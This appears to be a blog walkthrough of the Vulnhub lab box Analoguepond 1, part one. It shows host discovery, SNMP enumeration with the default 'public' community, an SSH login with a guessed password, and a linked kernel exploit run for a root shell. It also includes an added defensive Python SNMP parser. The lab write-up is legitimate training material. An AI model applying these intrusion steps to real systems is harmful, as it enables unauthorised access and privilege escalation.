In this post I want to start with a walkthrough of the Vulnhub challenge Analoguepond 1. Since I have not finished this box yet, I will split this walkthrough into several parts. This is the first part. So let's start.
The first thing I usually do when I start such a challenge is to scan the network in order to find out on which IP address I can find the box. In order to do so I usually use netdiscover:

root@kali:# netdiscover -r 192.168.56.0/24 -i eth1
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    **:**:**:**:**:**      1      60  Unknown vendor
 192.168.56.100  **:**:**:**:**:**      1      60  PCS Systemtechnik GmbH
 192.168.56.101  **:**:**:**:**:**      1      60  PCS Systemtechnik GmbH
As you can see, the IP address of the box is 192.168.56.101. So let's do a port scan against it to determine the open ports. At this point, you should keep in mind the hint in the description, which says "Remember TCP is not the only protocol on the Internet". This led me to do a complete port scan (i.e. including UDP). This took quite a while, but finally gave me this:

22/tcp  open          ssh    OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
68/udp  open|filtered dhcpc
161/udp open          snmp   SNMPv1 server; net-snmp SNMPv3 server (public)
The interesting ports are snmp. I assume that snmp is the protocol that was pointed to in the hint. I first tried to log in over ssh with some easy passwords, but there was no luck. So I connected to port 161 to find out what's hidden there. I used the tool snmp-check to do a first check.

root@kali:# snmp-check 192.168.56.101
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 192.168.56.101:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 192.168.56.101
  Hostname                      : analoguepond
  Description                   : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
  Contact                       : Eric Burdon <email@example.com>
  Location                      : There is a house in New Orleans they call it...
  Uptime snmp                   : 00:14:28.61
  Uptime system                 : 00:14:12.85
  System date                   : 2017-4-29 21:32:41.0
Cool, there is already a name, Eric! This might be a username. The second interesting thing is the location. Searching the string on Google immediately resulted in articles about a song by The Animals called 'The House of the Rising Sun'. So the answer is probably therisingsun, which could be a password. I also tried some other things on that snmp port, but I had no luck. Therefore I tried to log in on the ssh port with the gained username and (hopefully) password. And indeed it worked 😀
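Added example (not code from the original post or from snmp-check): a minimal BER decoder for an SNMPv1/v2c message plus a defender-side check, run over a constructed GetRequest of the kind snmp-check sends with community 'public'. It shows why the nmap line "SNMPv1 server ... (public)" is the finding: the community string and every requested OID are readable by anyone on the path, so a network sensor can spot the exposure the same way the scanner did.

```python
def _read_tlv(data, pos):
    # One BER tag-length-value element at pos -> (tag, value, position after it).
    tag, length = data[pos], data[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length

def _elements(seq):
    # All top-level elements of a BER SEQUENCE body as (tag, value) pairs.
    out, pos = [], 0
    while pos < len(seq):
        tag, value, pos = _read_tlv(seq, pos)
        out.append((tag, value))
    return out

def _decode_oid(raw):
    # BER OBJECT IDENTIFIER -> dotted string; the first byte packs the first two arcs.
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for byte in raw[1:]:
        value = (value << 7) | (byte & 0x7F)
        if not byte & 0x80:  # high bit clear ends a base-128 sub-identifier
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def parse_snmp_message(packet):
    # Returns version, community, PDU type and the OIDs of an SNMPv1/v2c message.
    tag, body, _ = _read_tlv(packet, 0)
    assert tag == 0x30, "not a BER SEQUENCE, so not an SNMP message"
    (_, version), (_, community), (pdu_type, pdu) = _elements(body)
    # PDU ::= request-id, error-status, error-index, VarBindList; 0xA0 = GetRequest
    varbinds = _elements(pdu)[3][1]
    # VarBind ::= SEQUENCE { name OBJECT IDENTIFIER, value }
    oids = [_decode_oid(_elements(vb)[0][1]) for _, vb in _elements(varbinds)]
    return {"version": version[0], "community": community.decode("latin-1"),
            "pdu_type": pdu_type, "oids": oids}

def weak_snmp_findings(msg):
    # Defender-side checks for what nmap reported above: 'SNMPv1 server ... (public)'.
    findings = []
    if msg["version"] in (0, 1):  # 0 = v1, 1 = v2c: no authentication, no encryption
        findings.append("SNMPv1/v2c: community string and data travel in cleartext")
    if msg["community"] in ("public", "private"):
        findings.append("default community string %r in use" % msg["community"])
    if "1.3.6.1.2.1.1.1.0" in msg["oids"]:  # sysDescr.0, the kernel/build string shown above
        findings.append("sysDescr readable: leaks OS, kernel version and hostname")
    return findings

# Constructed sample (hand-encoded for this example): SNMPv1 GetRequest for
# sysDescr.0 with community 'public', the kind of request snmp-check sends.
SAMPLE_GET_REQUEST = bytes.fromhex(
    "3026 020100 0406 7075626c6963 a019 020101 020100 020100"
    "300e 300c 0608 2b06010201010100 0500")
```

Calling weak_snmp_findings(parse_snmp_message(SAMPLE_GET_REQUEST)) yields all three findings; the same decoder applied to captured UDP/161 payloads turns a packet sensor into a check for v1/v2c and default community strings on the network.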
In eric's home folder there was not much to find. Some common files like the .bash_history (it had been deleted), but also an image called reticulatingsplines.gif which relates to SimCity. However, I could not yet figure out what this image has to do with the whole box. In a next step, I looked through the usual places where something useful could be hidden, like the /etc/passwd file and a bunch of other stuff. Eventually I checked the OS and found out something interesting:

eric@analoguepond:~$ uname -a
Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
The kernel version seems really outdated. Maybe there is a vulnerability in the kernel which allows us to escalate privileges. After some time googling I found this: https://www.exploit-db.com/exploits/39166/. I compiled it locally on my Kali machine and then uploaded it to the box. Ran it there and boom, we have a root shell 😀
So let's go to the

eric@analoguepond:/tmp$ ./exploit
root@analoguepond:/tmp# whoami
root
root@analoguepond:/tmp# cd /root
root@analoguepond:/root# ls -al
total 24
drwx------  3 root root 4096 Apr 26 20:51 .
drwxr-xr-x 22 root root 4096 Jan  7 18:42 ..
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
-rw-------  1 root root  237 Dec 17 09:38 flag.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
drwx------  2 root root 4096 Apr 26 20:51 .ssh
root@analoguepond:/root# cat flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?
Did the bright lights and big city knock you out...?
If you pull a stunt like this again, I'll send you back to Walker...
This is obviously troll flah #1
So keep going.
root@analoguepond:/root#

and cool, I found the troll flag that was also mentioned in the description.
With root privileges on the box and the first (troll) flag, I want to finish the first part of this walkthrough. As always, if you have any questions about the steps I have taken, or if you just have some comments or tips, please do not hesitate to write a comment or write to me directly. Please stay tuned for the second part.